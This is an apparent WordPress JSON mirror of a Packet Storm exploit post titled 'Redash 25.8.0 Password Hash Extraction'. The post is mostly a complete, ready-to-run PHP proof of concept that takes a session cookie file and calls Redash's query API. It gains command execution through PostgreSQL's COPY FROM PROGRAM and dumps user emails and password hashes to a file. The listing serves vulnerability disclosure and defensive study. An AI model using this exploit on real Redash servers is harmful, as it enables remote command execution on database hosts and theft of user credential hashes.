{"id":41411,"date":"2026-02-18T12:49:59","date_gmt":"2026-02-18T12:49:59","guid":{"rendered":"http:\/\/localhost\/?p=41411"},"modified":"2026-02-18T12:49:59","modified_gmt":"2026-02-18T12:49:59","slug":"redash-2580-password-hash-extraction","status":"publish","type":"post","link":"https:\/\/zero.redgem.net\/?p=41411","title":{"rendered":"\ud83d\udcc4 Redash 25.8.0 Password Hash Extraction_PACKETSTORM:215802"},"content":{"rendered":"<p>{&#8220;lastseen&#8221;:&#8221;2026-02-18T17:36:32&#8243;,&#8221;description&#8221;:&#8221;This PHP script is a security exploitation tool that targets Redash, an open-source data visualization platform. The tool leverages a configuration vulnerability in Redash&#8217;s default PostgreSQL setup to perform two critical attacks. It can execute&#8230;&#8221;,&#8221;published&#8221;:&#8221;2026-02-18T00:00:00&#8243;,&#8221;modified&#8221;:&#8221;2026-02-18T00:00:00&#8243;,&#8221;type&#8221;:&#8221;packetstorm&#8221;,&#8221;title&#8221;:&#8221;\ud83d\udcc4 Redash 25.8.0 Password Hash Extraction&#8221;,&#8221;source&#8221;:&#8221;&#8221;,&#8221;references&#8221;:&#8221;&#8221;,&#8221;id&#8221;:&#8221;PACKETSTORM:215802&#8243;,&#8221;bulletinFamily&#8221;:&#8221;exploit&#8221;,&#8221;cwe&#8221;:null,&#8221;cvelist&#8221;:[],&#8221;sourceData&#8221;:&#8221;=============================================================================================================================================\\n    | # Title     : Redash 25.8.0 Password Hash Extraction                                                                                      |\\n    | # Author    : indoushka                                                                                                                   |\\n    | # Tested on : windows 11 Fr(Pro) \/ browser : Mozilla firefox 145.0.2 (64 bits)                                                            |\\n    | # Vendor    : https:\/\/redash.io\/                                                                                                          |\\n    =============================================================================================================================================\\n    \\n    [+] Summary    : This PHP script is a security exploitation tool that targets Redash, an open-source data visualization platform. \\n                     The tool leverages a configuration vulnerability in Redash&#8217;s default PostgreSQL setup to perform two critical attacks:\\n    \\t\\t\\t\\t \\n    [+] Key Capabilities:\\n    \\n    Remote Command Execution (RCE) &#8211; Executes arbitrary system commands on the database server using PostgreSQL&#8217;s COPY FROM PROGRAM functionality\\n    \\n    Password Hash Extraction &#8211; Extracts password hashes from Redash&#8217;s internal user authentication table\\n    \\n    [+] POC :\\n    \\n    \\u003c?php\\n    \/*\\n     * poc.php\\n     *\\n     * =Usage=\\n     \\n     * php poc.php \\u003curl\\u003e \\u003ccookie_file\\u003e [&#8211;cmd \\u003ccommand\\u003e | &#8211;dump]\\n     \\n     * Example: php poc.php http:\/\/localhost:5000 cookie.txt &#8211;cmd \\&#8221;id\\&#8221;\\n     \\n     * Example: php poc.php http:\/\/localhost:5000 cookie.txt &#8211;dump\\n     *\/\\n    \\n    error_reporting(E_ALL);\\n    ini_set(&#8216;display_errors&#8217;, 1);\\n    \\n    $GLOBALS[&#8216;ssl_verify&#8217;] = false;\\n    \\n    function print_usage($script_name) {\\n        echo \\&#8221;Usage: php $script_name \\u003curl\\u003e \\u003ccookie_file\\u003e [&#8211;cmd \\u003ccommand\\u003e | &#8211;dump]\\\\n\\\\n\\&#8221;;\\n        echo \\&#8221;Examples:\\\\n\\&#8221;;\\n        echo \\&#8221;  php $script_name http:\/\/localhost:5000 cookie.txt &#8211;cmd &#8216;id&#8217;\\\\n\\&#8221;;\\n        echo \\&#8221;  php $script_name $script_name http:\/\/localhost:5000 cookie.txt &#8211;dump\\\\n\\\\n\\&#8221;;\\n    }\\n    \\n    function load_cookies($path) {\\n        $cookies = [];\\n        if (!file_exists($path)) {\\n            die(\\&#8221;Error: Cookie file not found: $path\\\\n\\&#8221;);\\n        }\\n        \\n        $lines = file($path, FILE_IGNORE_NEW_LINES | FILE_SKIP_EMPTY_LINES);\\n        foreach ($lines as $line) {\\n            if (trim($line) === &#8221; || $line[0] === &#8216;#&#8217;) {\\n                continue;\\n            }\\n    \\n            $parts = explode(\\&#8221;\\\\t\\&#8221;, $line);\\n            if (count($parts) \\u003e= 7) {\\n                $cookies[$parts[5]] = $parts[6];\\n            }\\n        }\\n        \\n        return $cookies;\\n    }\\n    \\n    function normalize_url($url) {\\n        $url = rtrim($url, &#8216;\/&#8217;);\\n        \\n        if (strpos($url, &#8216;http:\/\/&#8217;) === 0 || strpos($url, &#8216;https:\/\/&#8217;) === 0) {\\n            return $url;\\n        }\\n        \\n        $protocols = [&#8216;https:\/\/&#8217;, &#8216;http:\/\/&#8217;];\\n        foreach ($protocols as $protocol) {\\n            $test_url = $protocol . $url;\\n            $ch = curl_init($test_url);\\n            curl_setopt_array($ch, [\\n                CURLOPT_RETURNTRANSFER =\\u003e true,\\n                CURLOPT_NOBODY =\\u003e true,\\n                CURLOPT_HEADER =\\u003e true,\\n                CURLOPT_SSL_VERIFYPEER =\\u003e $GLOBALS[&#8216;ssl_verify&#8217;],\\n                CURLOPT_SSL_VERIFYHOST =\\u003e $GLOBALS[&#8216;ssl_verify&#8217;],\\n                CURLOPT_TIMEOUT =\\u003e 3\\n            ]);\\n            \\n            $response = curl_exec($ch);\\n            $http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);\\n            curl_close($ch);\\n            \\n            if ($http_code \\u003e 0) {\\n                return $test_url;\\n            }\\n        }\\n        \\n        return &#8216;http:\/\/&#8217; . $url;\\n    }\\n    \\n    function find_api_path($base_url, $cookies) {\\n        $session = create_session($cookies);\\n        \\n        $paths = [\\n            \\&#8221;\/api\/query_results\\&#8221;,\\n            \\&#8221;\/default\/api\/query_results\\&#8221;,\\n            \\&#8221;\/org\/api\/query_results\\&#8221;,\\n        ];\\n        \\n        foreach ($paths as $path) {\\n            $url = $base_url . $path;\\n            try {\\n                $response = http_post($session, $url, [\\n                    \\&#8221;query\\&#8221; =\\u003e \\&#8221;SELECT 1\\&#8221;,\\n                    \\&#8221;data_source_id\\&#8221; =\\u003e 1,\\n                    \\&#8221;parameters\\&#8221; =\\u003e []\\n                ]);\\n                \\n                if ($response[&#8216;status&#8217;] == 200 || $response[&#8216;status&#8217;] == 400) {\\n                    return $path;\\n                }\\n            } catch (Exception $e) {\\n            }\\n        }\\n        \\n        return $paths[0];\\n    }\\n    \\n    function create_session($cookies) {\\n        $cookie_string = &#8221;;\\n        foreach ($cookies as $name =\\u003e $value) {\\n            $cookie_string .= $name . &#8216;=&#8217; . $value . &#8216;; &#8216;;\\n        }\\n        \\n        return [\\n            &#8216;cookies&#8217; =\\u003e rtrim($cookie_string, &#8216;; &#8216;),\\n            &#8216;headers&#8217; =\\u003e [\\n                &#8216;Content-Type: application\/json&#8217;,\\n                &#8216;Accept: application\/json&#8217;\\n            ]\\n        ];\\n    }\\n    \\n    function http_get($session, $url, $timeout = 15) {\\n        $ch = curl_init($url);\\n        \\n        curl_setopt_array($ch, [\\n            CURLOPT_RETURNTRANSFER =\\u003e true,\\n            CURLOPT_HTTPHEADER =\\u003e $session[&#8216;headers&#8217;],\\n            CURLOPT_COOKIE =\\u003e $session[&#8216;cookies&#8217;],\\n            CURLOPT_SSL_VERIFYPEER =\\u003e $GLOBALS[&#8216;ssl_verify&#8217;],\\n            CURLOPT_SSL_VERIFYHOST =\\u003e $GLOBALS[&#8216;ssl_verify&#8217;],\\n            CURLOPT_TIMEOUT =\\u003e $timeout,\\n            CURLOPT_FOLLOWLOCATION =\\u003e true\\n        ]);\\n        \\n        $response = curl_exec($ch);\\n        $http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);\\n        $error = curl_error($ch);\\n        curl_close($ch);\\n        \\n        if ($error \\u0026\\u0026 $http_code == 0) {\\n            throw new Exception(\\&#8221;HTTP request failed: $error\\&#8221;);\\n        }\\n        \\n        return [\\n            &#8216;status&#8217; =\\u003e $http_code,\\n            &#8216;body&#8217; =\\u003e $response,\\n            &#8216;json&#8217; =\\u003e json_decode($response, true)\\n        ];\\n    }\\n    \\n    function http_post($session, $url, $data, $timeout = 30) {\\n        $ch = curl_init($url);\\n        \\n        curl_setopt_array($ch, [\\n            CURLOPT_RETURNTRANSFER =\\u003e true,\\n            CURLOPT_POST =\\u003e true,\\n            CURLOPT_POSTFIELDS =\\u003e json_encode($data),\\n            CURLOPT_HTTPHEADER =\\u003e array_merge($session[&#8216;headers&#8217;], [&#8216;Content-Type: application\/json&#8217;]),\\n            CURLOPT_COOKIE =\\u003e $session[&#8216;cookies&#8217;],\\n            CURLOPT_SSL_VERIFYPEER =\\u003e $GLOBALS[&#8216;ssl_verify&#8217;],\\n            CURLOPT_SSL_VERIFYHOST =\\u003e $GLOBALS[&#8216;ssl_verify&#8217;],\\n            CURLOPT_TIMEOUT =\\u003e $timeout,\\n            CURLOPT_FOLLOWLOCATION =\\u003e true\\n        ]);\\n        \\n        $response = curl_exec($ch);\\n        $http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);\\n        $error = curl_error($ch);\\n        curl_close($ch);\\n        \\n        if ($error \\u0026\\u0026 $http_code == 0) {\\n            throw new Exception(\\&#8221;HTTP request failed: $error\\&#8221;);\\n        }\\n        \\n        return [\\n            &#8216;status&#8217; =\\u003e $http_code,\\n            &#8216;body&#8217; =\\u003e $response,\\n            &#8216;json&#8217; =\\u003e json_decode($response, true)\\n        ];\\n    }\\n    \\n    function execute_rce($base_url, $cookies, $command) {\\n        $session = create_session($cookies);\\n        $api_path = find_api_path($base_url, $cookies);\\n        $endpoint = $base_url . $api_path;\\n        \\n        $table = \\&#8221;rce_\\&#8221; . substr(md5($command), 0, 8);\\n        \\n        $payload = [\\n            \\&#8221;query\\&#8221; =\\u003e \\&#8221;CREATE UNLOGGED TABLE IF NOT EXISTS $table AS SELECT &#8216;1&#8217; WHERE 1=0; COPY $table FROM PROGRAM &#8216;$command&#8217;; SELECT * FROM $table\\&#8221;,\\n            \\&#8221;data_source_id\\&#8221; =\\u003e 1,\\n            \\&#8221;parameters\\&#8221; =\\u003e []\\n        ];\\n        \\n        $resp = http_post($session, $endpoint, $payload);\\n        \\n        if ($resp[&#8216;status&#8217;] != 200) {\\n            throw new Exception(\\&#8221;Query submission failed: HTTP \\&#8221; . $resp[&#8216;status&#8217;] . \\&#8221; &#8211; check credentials \/ session expiration\\&#8221;);\\n        }\\n        \\n        $result = $resp[&#8216;json&#8217;];\\n    \\n        if (isset($result[&#8216;query_result&#8217;])) {\\n            $rows = $result[&#8216;query_result&#8217;][&#8216;data&#8217;][&#8216;rows&#8217;];\\n            $output = [];\\n            foreach ($rows as $row) {\\n                if (isset($row[&#8216;?column?&#8217;])) {\\n                    $output[] = $row[&#8216;?column?&#8217;];\\n                }\\n            }\\n            return $output;\\n        }\\n    \\n        $job_id = $result[&#8216;job&#8217;][&#8216;id&#8217;] ?? null;\\n        if (!$job_id) {\\n            throw new Exception(\\&#8221;Failed to submit query: \\&#8221; . print_r($result, true));\\n        }\\n    \\n        $deadline = time() + 60;\\n        while (time() \\u003c $deadline) {\\n            $job_url = $base_url . \\&#8221;\/api\/jobs\/$job_id\\&#8221;;\\n            $job_resp = http_get($session, $job_url);\\n            \\n            if ($job_resp[&#8216;status&#8217;] != 200) {\\n                throw new Exception(\\&#8221;Failed to poll job: HTTP \\&#8221; . $job_resp[&#8216;status&#8217;]);\\n            }\\n            \\n            $job = $job_resp[&#8216;json&#8217;][&#8216;job&#8217;] ?? [];\\n            \\n            if (($job[&#8216;status&#8217;] ?? 0) == 3) {  \/\/ Complete\\n                $result_id = $job[&#8216;query_result_id&#8217;] ?? null;\\n                $result_paths = [\\n                    \\&#8221;\/api\/query_results\/$result_id\\&#8221;,\\n                    \\&#8221;\/default\/api\/query_results\/$result_id\\&#8221;\\n                ];\\n                \\n                foreach ($result_paths as $res_path) {\\n                    try {\\n                        $url = $base_url . $res_path;\\n                        $res = http_get($session, $url);\\n                        if ($res[&#8216;status&#8217;] == 200) {\\n                            $rows = $res[&#8216;json&#8217;][&#8216;query_result&#8217;][&#8216;data&#8217;][&#8216;rows&#8217;];\\n                            $output = [];\\n                            foreach ($rows as $row) {\\n                                if (isset($row[&#8216;?column?&#8217;])) {\\n                                    $output[] = $row[&#8216;?column?&#8217;];\\n                                }\\n                            }\\n                            return $output;\\n                        }\\n                    } catch (Exception $e) {\\n                    }\\n                }\\n                throw new Exception(\\&#8221;Could not fetch query results\\&#8221;);\\n            }\\n            \\n            if (($job[&#8216;status&#8217;] ?? 0) == 4) {  \/\/ Failed\\n                throw new Exception(\\&#8221;Job failed: \\&#8221; . ($job[&#8216;error&#8217;] ?? &#8216;Unknown error&#8217;));\\n            }\\n            \\n            usleep(500000); \/\/ 0.5 seconds\\n        }\\n        \\n        throw new Exception(\\&#8221;Job did not complete\\&#8221;);\\n    }\\n    \\n    function extract_password_hashes($base_url, $cookies) {\\n        $session = create_session($cookies);\\n        $api_path = find_api_path($base_url, $cookies);\\n        $endpoint = $base_url . $api_path;\\n        $payload = [\\n            \\&#8221;query\\&#8221; =\\u003e \\&#8221;SELECT email, password_hash FROM users\\&#8221;,\\n            \\&#8221;data_source_id\\&#8221; =\\u003e 1,\\n            \\&#8221;parameters\\&#8221; =\\u003e []\\n        ];\\n        \\n        $resp = http_post($session, $endpoint, $payload);\\n        \\n        if ($resp[&#8216;status&#8217;] != 200) {\\n            throw new Exception(\\&#8221;Query submission failed: HTTP \\&#8221; . $resp[&#8216;status&#8217;] . \\&#8221; &#8211; check credentials \/ session expiration\\&#8221;);\\n        }\\n        \\n        $result = $resp[&#8216;json&#8217;];\\n    \\n        if (isset($result[&#8216;query_result&#8217;])) {\\n            $rows = $result[&#8216;query_result&#8217;][&#8216;data&#8217;][&#8216;rows&#8217;];\\n            $hash_list = [];\\n            foreach ($rows as $row) {\\n                $email = $row[&#8217;email&#8217;] ?? &#8221;;\\n                $password_hash = $row[&#8216;password_hash&#8217;] ?? &#8221;;\\n                if ($password_hash \\u0026\\u0026 strpos($password_hash, &#8216;$&#8217;) === 0 \\u0026\\u0026 $email) {\\n                    $hash_list[] = [$email, $password_hash];\\n                }\\n            }\\n            return $hash_list;\\n        }\\n    \\n        $job_id = $result[&#8216;job&#8217;][&#8216;id&#8217;] ?? null;\\n        if (!$job_id) {\\n            throw new Exception(\\&#8221;Failed to submit query: \\&#8221; . print_r($result, true));\\n        }\\n    \\n        $deadline = time() + 60;\\n        while (time() \\u003c $deadline) {\\n            $job_url = $base_url . \\&#8221;\/api\/jobs\/$job_id\\&#8221;;\\n            $job_resp = http_get($session, $job_url);\\n            \\n            if ($job_resp[&#8216;status&#8217;] != 200) {\\n                throw new Exception(\\&#8221;Failed to poll job: HTTP \\&#8221; . $job_resp[&#8216;status&#8217;]);\\n            }\\n            \\n            $job = $job_resp[&#8216;json&#8217;][&#8216;job&#8217;] ?? [];\\n            \\n            if (($job[&#8216;status&#8217;] ?? 0) == 3) {  \/\/ Complete\\n                $result_id = $job[&#8216;query_result_id&#8217;] ?? null;\\n                $result_paths = [\\n                    \\&#8221;\/api\/query_results\/$result_id\\&#8221;,\\n                    \\&#8221;\/default\/api\/query_results\/$result_id\\&#8221;\\n                ];\\n                \\n                foreach ($result_paths as $res_path) {\\n                    try {\\n                        $url = $base_url . $res_path;\\n                        $res = http_get($session, $url);\\n                        if ($res[&#8216;status&#8217;] == 200) {\\n                            $rows = $res[&#8216;json&#8217;][&#8216;query_result&#8217;][&#8216;data&#8217;][&#8216;rows&#8217;];\\n                            $hash_list = [];\\n                            foreach ($rows as $row) {\\n                                $email = $row[&#8217;email&#8217;] ?? &#8221;;\\n                                $password_hash = $row[&#8216;password_hash&#8217;] ?? &#8221;;\\n                                if ($password_hash \\u0026\\u0026 strpos($password_hash, &#8216;$&#8217;) === 0 \\u0026\\u0026 $email) {\\n                                    $hash_list[] = [$email, $password_hash];\\n                                }\\n                            }\\n                            return $hash_list;\\n                        }\\n                    } catch (Exception $e) {\\n                    }\\n                }\\n                throw new Exception(\\&#8221;Could not fetch query results\\&#8221;);\\n            }\\n            \\n            if (($job[&#8216;status&#8217;] ?? 0) == 4) {  \/\/ Failed\\n                throw new Exception(\\&#8221;Job failed: \\&#8221; . ($job[&#8216;error&#8217;] ?? &#8216;Unknown error&#8217;));\\n            }\\n            \\n            usleep(500000); \/\/ 0.5 seconds\\n        }\\n        \\n        throw new Exception(\\&#8221;Job did not complete\\&#8221;);\\n    }\\n    \\n    function main($argv) {\\n        if (count($argv) \\u003c 3) {\\n            print_usage($argv[0]);\\n            exit(1);\\n        }\\n        \\n        $url = $argv[1];\\n        $cookie_file = $argv[2];\\n        $mode = \\&#8221;&#8211;dump\\&#8221;;\\n        $command = null;\\n        \\n        if (count($argv) \\u003e 3) {\\n            if ($argv[3] == \\&#8221;&#8211;cmd\\&#8221;) {\\n                $mode = \\&#8221;&#8211;cmd\\&#8221;;\\n                if (count($argv) \\u003c 5) {\\n                    echo \\&#8221;Error: &#8211;cmd requires a command argument\\\\n\\&#8221;;\\n                    exit(1);\\n                }\\n                $command = $argv[4];\\n            } elseif ($argv[3] == \\&#8221;&#8211;dump\\&#8221;) {\\n                $mode = \\&#8221;&#8211;dump\\&#8221;;\\n            } else {\\n                echo \\&#8221;Error: Unknown option {$argv[3]}\\\\n\\&#8221;;\\n                exit(1);\\n            }\\n        }\\n        \\n        try {\\n            $url = normalize_url($url);\\n            $cookies = load_cookies($cookie_file);\\n            \\n            if ($mode == \\&#8221;&#8211;cmd\\&#8221;) {\\n                fwrite(STDERR, \\&#8221;[*] Executing command: $command\\\\n\\\\n\\&#8221;);\\n                $output = execute_rce($url, $cookies, $command);\\n                foreach ($output as $line) {\\n                    echo $line . \\&#8221;\\\\n\\&#8221;;\\n                }\\n            } else {  \/\/ &#8211;dump\\n                fwrite(STDERR, \\&#8221;[*] Extracting password hashes&#8230;\\\\n\\&#8221;);\\n                $hash_list = extract_password_hashes($url, $cookies);\\n                fwrite(STDERR, \\&#8221;[*] Found \\&#8221; . count($hash_list) . \\&#8221; password hashes\\\\n\\\\n\\&#8221;);\\n                \\n                if (empty($hash_list)) {\\n                    fwrite(STDERR, \\&#8221;No password hashes found\\\\n\\&#8221;);\\n                    exit(1);\\n                }\\n                $hash_file = fopen(&#8216;hashes.txt&#8217;, &#8216;w&#8217;);\\n                foreach ($hash_list as $hash_entry) {\\n                    list($email, $password_hash) = $hash_entry;\\n                    echo $email . \\&#8221;\\\\n\\&#8221;;\\n                    echo $password_hash . \\&#8221;\\\\n\\\\n\\&#8221;;\\n                    fwrite($hash_file, $password_hash . \\&#8221;\\\\n\\&#8221;);\\n                }\\n                fclose($hash_file);\\n                \\n                fwrite(STDERR, \\&#8221;[*] Hashes written to hashes.txt\\\\n\\&#8221;);\\n            }\\n        } catch (Exception $e) {\\n            echo \\&#8221;Error: \\&#8221; . $e-\\u003egetMessage() . \\&#8221;\\\\n\\&#8221;;\\n            exit(1);\\n        }\\n    }\\n    \\n    if (php_sapi_name() === &#8216;cli&#8217;) {\\n        main($argv);\\n    } else {\\n        echo \\&#8221;This script must be run from the command line.\\\\n\\&#8221;;\\n    }\\n    ?\\u003e\\n    Greetings to :=====================================================================================\\n    jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|\\n    ===================================================================================================&#8221;,&#8221;sourceHref&#8221;:&#8221;https:\/\/packetstorm.news\/download\/215802&#8243;,&#8221;cvss&#8221;:{&#8220;score&#8221;:0,&#8221;severity&#8221;:&#8221;NONE&#8221;,&#8221;vector&#8221;:&#8221;NONE&#8221;,&#8221;version&#8221;:&#8221;NONE&#8221;},&#8221;cvss2&#8243;:{},&#8221;cvss3&#8243;:{&#8220;version&#8221;:&#8221;&#8221;,&#8221;vectorString&#8221;:&#8221;&#8221;,&#8221;baseScore&#8221;:0,&#8221;baseSeverity&#8221;:&#8221;&#8221;,&#8221;attackVector&#8221;:&#8221;&#8221;,&#8221;attackComplexity&#8221;:&#8221;&#8221;,&#8221;privilegesRequired&#8221;:&#8221;&#8221;,&#8221;userInteraction&#8221;:&#8221;&#8221;,&#8221;scope&#8221;:&#8221;&#8221;,&#8221;confidentialityImpact&#8221;:&#8221;&#8221;,&#8221;integrityImpact&#8221;:&#8221;&#8221;,&#8221;availabilityImpact&#8221;:&#8221;&#8221;,&#8221;cvssV3&#8243;:{&#8220;version&#8221;:&#8221;&#8221;,&#8221;vectorString&#8221;:&#8221;&#8221;,&#8221;baseScore&#8221;:0,&#8221;baseSeverity&#8221;:&#8221;&#8221;,&#8221;attackVector&#8221;:&#8221;&#8221;,&#8221;attackComplexity&#8221;:&#8221;&#8221;,&#8221;privilegesRequired&#8221;:&#8221;&#8221;,&#8221;userInteraction&#8221;:&#8221;&#8221;,&#8221;scope&#8221;:&#8221;&#8221;,&#8221;confidentialityImpact&#8221;:&#8221;&#8221;,&#8221;integrityImpact&#8221;:&#8221;&#8221;,&#8221;availabilityImpact&#8221;:&#8221;&#8221;}},&#8221;href&#8221;:&#8221;https:\/\/packetstorm.news\/files\/id\/215802\/&#8221;,&#8221;category_name&#8221;:&#8221;Exploit&#8221;,&#8221;post_link&#8221;:&#8221;&#8221;,&#8221;product&#8221;:&#8221;&#8221;,&#8221;version&#8221;:&#8221;&#8221;,&#8221;vendor&#8221;:&#8221;&#8221;,&#8221;ai_description&#8221;:&#8221;&#8221;,&#8221;ai_severity&#8221;:&#8221;&#8221;,&#8221;ai_vendor&#8221;:&#8221;&#8221;,&#8221;ai_product&#8221;:&#8221;&#8221;,&#8221;ai_version&#8221;:&#8221;&#8221;,&#8221;ai_score&#8221;:0}<\/p>\n","protected":false},"excerpt":{"rendered":"<p>{&#8220;lastseen&#8221;:&#8221;2026-02-18T17:36:32&#8243;,&#8221;description&#8221;:&#8221;This PHP script is a security exploitation tool that targets Redash, an open-source data visualization platform. The tool leverages a configuration vulnerability in Redash&#8217;s default&#8230;<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[6,8,12,13,33,53,7,11,5],"class_list":["post-41411","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-cve","tag-cvss","tag-exploit","tag-news","tag-none","tag-packetstorm","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.5 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>\ud83d\udcc4 Redash 25.8.0 Password Hash Extraction_PACKETSTORM:215802 - zero redgem<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/zero.redgem.net\/?p=41411\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"\ud83d\udcc4 Redash 25.8.0 Password Hash Extraction_PACKETSTORM:215802 - zero redgem\" \/>\n<meta property=\"og:description\" content=\"{&#8220;lastseen&#8221;:&#8221;2026-02-18T17:36:32&#8243;,&#8221;description&#8221;:&#8221;This PHP script is a security exploitation tool that targets Redash, an open-source data visualization platform. The tool leverages a configuration vulnerability in Redash&#8217;s default...\" \/>\n<meta property=\"og:url\" content=\"https:\/\/zero.redgem.net\/?p=41411\" \/>\n<meta property=\"og:site_name\" content=\"zero redgem\" \/>\n<meta property=\"article:published_time\" content=\"2026-02-18T12:49:59+00:00\" \/>\n<meta name=\"author\" content=\"invoker\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"invoker\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"10 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=41411#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=41411\"},\"author\":{\"name\":\"invoker\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\"},\"headline\":\"\ud83d\udcc4 Redash 25.8.0 Password Hash Extraction_PACKETSTORM:215802\",\"datePublished\":\"2026-02-18T12:49:59+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=41411\"},\"wordCount\":2036,\"commentCount\":0,\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"keywords\":[\"CVE\",\"CVSS\",\"exploit\",\"news\",\"NONE\",\"packetstorm\",\"Security\",\"tapic\",\"Vulnerability\"],\"articleSection\":[\"category_exploit\"],\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=41411#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=41411\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?p=41411\",\"name\":\"\ud83d\udcc4 Redash 25.8.0 Password Hash Extraction_PACKETSTORM:215802 - zero redgem\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\"},\"datePublished\":\"2026-02-18T12:49:59+00:00\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=41411#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=41411\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=41411#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/zero.redgem.net\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"\ud83d\udcc4 Redash 25.8.0 Password Hash Extraction_PACKETSTORM:215802\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"name\":\"zero redgem\",\"description\":\"\",\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/zero.redgem.net\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\",\"name\":\"zero redgem\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"\",\"contentUrl\":\"\",\"width\":191,\"height\":188,\"caption\":\"zero redgem\"},\"image\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\"}},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\",\"name\":\"invoker\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"caption\":\"invoker\"},\"sameAs\":[\"https:\\\/\\\/zero.redgem.net\"],\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?author=1\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"\ud83d\udcc4 Redash 25.8.0 Password Hash Extraction_PACKETSTORM:215802 - zero redgem","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/zero.redgem.net\/?p=41411","og_locale":"en_US","og_type":"article","og_title":"\ud83d\udcc4 Redash 25.8.0 Password Hash Extraction_PACKETSTORM:215802 - zero redgem","og_description":"{&#8220;lastseen&#8221;:&#8221;2026-02-18T17:36:32&#8243;,&#8221;description&#8221;:&#8221;This PHP script is a security exploitation tool that targets Redash, an open-source data visualization platform. The tool leverages a configuration vulnerability in Redash&#8217;s default...","og_url":"https:\/\/zero.redgem.net\/?p=41411","og_site_name":"zero redgem","article_published_time":"2026-02-18T12:49:59+00:00","author":"invoker","twitter_card":"summary_large_image","twitter_misc":{"Written by":"invoker","Est. reading time":"10 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/zero.redgem.net\/?p=41411#article","isPartOf":{"@id":"https:\/\/zero.redgem.net\/?p=41411"},"author":{"name":"invoker","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca"},"headline":"\ud83d\udcc4 Redash 25.8.0 Password Hash 